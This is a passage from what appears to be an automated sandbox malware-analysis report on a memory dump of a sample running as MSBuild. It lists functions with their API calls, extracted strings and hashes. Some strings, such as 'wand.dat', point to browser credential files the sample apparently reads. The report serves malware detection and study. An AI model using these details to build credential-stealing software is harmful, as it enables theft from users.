                                                                                                                                            • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                                            Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 004116FF
                                                                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                              • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                              • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                              • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                            • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                            • API String ID: 2618321458-3614832568
                                                                                                                                            • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                            • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                                            • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                            • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                                            Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFilefreememset
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2507021081-0
                                                                                                                                            • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                                                            • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                                            • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                                                            • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                                            Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                            • malloc.MSVCRT ref: 00417524
                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                            • free.MSVCRT ref: 00417544
                                                                                                                                            • free.MSVCRT ref: 00417562
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4131324427-0
                                                                                                                                            • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                                                            • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                                            • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                                                            • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                                            Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                                                            • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                                                            • free.MSVCRT ref: 0041822B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: PathTemp$free
                                                                                                                                            • String ID: %s\etilqs_$etilqs_
                                                                                                                                            • API String ID: 924794160-1420421710
                                                                                                                                            • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                            • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                            • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                            • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                            Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                            • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                            • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memcpy
                                                                                                                                            • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                            • API String ID: 3510742995-272990098
                                                                                                                                            • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                            • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                                            • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                            • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                                            Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 0044A6EB
                                                                                                                                            • memset.MSVCRT ref: 0044A6FB
                                                                                                                                            • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                            • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memcpymemset
                                                                                                                                            • String ID: gj
                                                                                                                                            • API String ID: 1297977491-4203073231
                                                                                                                                            • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                            • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                                            • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                            • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                            Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                            • malloc.MSVCRT ref: 004174BD
                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                            • free.MSVCRT ref: 004174E4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4053608372-0
                                                                                                                                            • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                                                            • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                            • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                                                            • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                            Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetParent.USER32(?), ref: 0040D453
                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$Rect$ClientParentPoints
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4247780290-0
                                                                                                                                            • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                            • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                                            • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                            • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                                            Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                            • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                                            • memset.MSVCRT ref: 004450CD
                                                                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                              • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1471605966-0
                                                                                                                                            • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                                            • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                            • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                                            • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                            Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 004100FB
                                                                                                                                            • memset.MSVCRT ref: 00410112
                                                                                                                                              • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                              • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                            • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                            • String ID: </%s>
                                                                                                                                            • API String ID: 3400436232-259020660
                                                                                                                                            • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                            • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                                            • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                            • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                                            Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 0040D58D
                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                                            • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                            • String ID: caption
                                                                                                                                            • API String ID: 1523050162-4135340389
                                                                                                                                            • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                            • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                                            • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                            • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                                            Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                              • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                            • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                            • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                            • String ID: MS Sans Serif
                                                                                                                                            • API String ID: 210187428-168460110
                                                                                                                                            • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                            • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                                            • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                            • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                                            Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 0040560C
                                                                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                              • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                              • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                              • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                            • String ID: *.*$dat$wand.dat
                                                                                                                                            • API String ID: 2618321458-1828844352
                                                                                                                                            • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                            • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                                            • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                            • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                                            Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 00412057
                                                                                                                                              • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                                            • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                            • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                            • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3550944819-0
                                                                                                                                            • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                            • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                            • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                            • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                                            Function 0040F508 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • free.MSVCRT ref: 0040F561
                                                                                                                                            • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                                                            • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memcpy$free
                                                                                                                                            • String ID: g4@
                                                                                                                                            • API String ID: 2888793982-2133833424
                                                                                                                                            • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                                                            • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                                            • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                                                            • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                                            Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 004144E7
                                                                                                                                              • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                              • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                            • memset.MSVCRT ref: 0041451A
                                                                                                                                            • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1127616056-0
                                                                                                                                            • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                            • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                                            • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                            • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                                            Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,76E1DF80,?,0041755F,?), ref: 00417452
                                                                                                                                            • malloc.MSVCRT ref: 00417459
                                                                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,76E1DF80,?,0041755F,?), ref: 00417478
                                                                                                                                            • free.MSVCRT ref: 0041747F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2605342592-0
                                                                                                                                            • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                                                            • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                                            • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                                                            • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                                            Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
